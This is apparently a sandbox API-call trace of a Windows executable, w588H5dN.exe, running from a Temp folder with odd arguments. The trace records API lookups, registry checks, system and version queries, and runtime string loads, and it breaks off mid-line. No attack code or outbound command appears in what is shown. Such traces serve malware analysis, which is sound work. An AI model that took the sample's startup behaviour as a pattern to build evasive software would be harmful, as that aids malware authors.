0x7696992d [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.997] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.998] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0117.000] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0117.001] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0117.001] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0117.001] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0117.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0117.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0117.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0117.002] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0117.002] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0117.003] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0117.003] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0117.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0117.003] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0117.003] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0117.003] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0117.004] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0117.004] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0117.004] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0117.004] SetThreadLocale (Locale=0x400) returned 1 [0117.005] GetVersion () returned 0x1db10106 [0117.005] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.005] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0117.005] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.005] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0117.005] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.005] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0117.005] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0117.005] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.005] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0117.005] GetACP () returned 0x4e4 [0117.005] GetCurrentThreadId () returned 0xe60 [0117.005] GetVersion () returned 0x1db10106 [0117.005] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x711cb0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0117.006] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.006] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.006] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x520000 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] GetUserDefaultUILanguage () returned 0x409 [0117.007] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0117.007] GetThreadUILanguage () returned 0x120409 [0117.007] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0117.008] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x64a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x64a680, pcchLanguagesBuffer=0x12d768) returned 1 [0117.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.008] GetUserDefaultUILanguage () returned 0x409 [0117.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0117.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.009] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.009] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0117.094] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0117.094] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0117.094] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724438 [0117.094] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0117.094] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0117.094] LoadStringW (in: 